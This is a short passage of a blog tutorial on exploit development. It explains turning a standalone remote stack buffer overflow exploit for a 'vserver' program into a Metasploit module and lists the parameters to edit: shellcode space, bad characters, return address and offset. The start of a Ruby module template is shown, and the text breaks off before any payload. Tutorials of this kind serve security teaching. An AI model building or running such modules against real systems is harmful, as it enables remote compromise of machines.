Build Metasploit Module (Windows Exploit Development)

This is the continuation of my previous post Windows Exploit Development (Remote Stack BoF ). Let's try to convert the standalone exploit for vserver to a metasploit module. If you think that this task is complicated you're wrong because what we need, is only a template taken from this corelan tutorial and edit few things. What we edit: Information details. How much space we have for the shellcode (2062 bytes). Bad chars. Target machine, return address and offset. require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Vserver remote bof', 'Description' => %q{this is a description}, 'Author' => [ 'SecurityObscurity' ], 'Version' => '$Revision...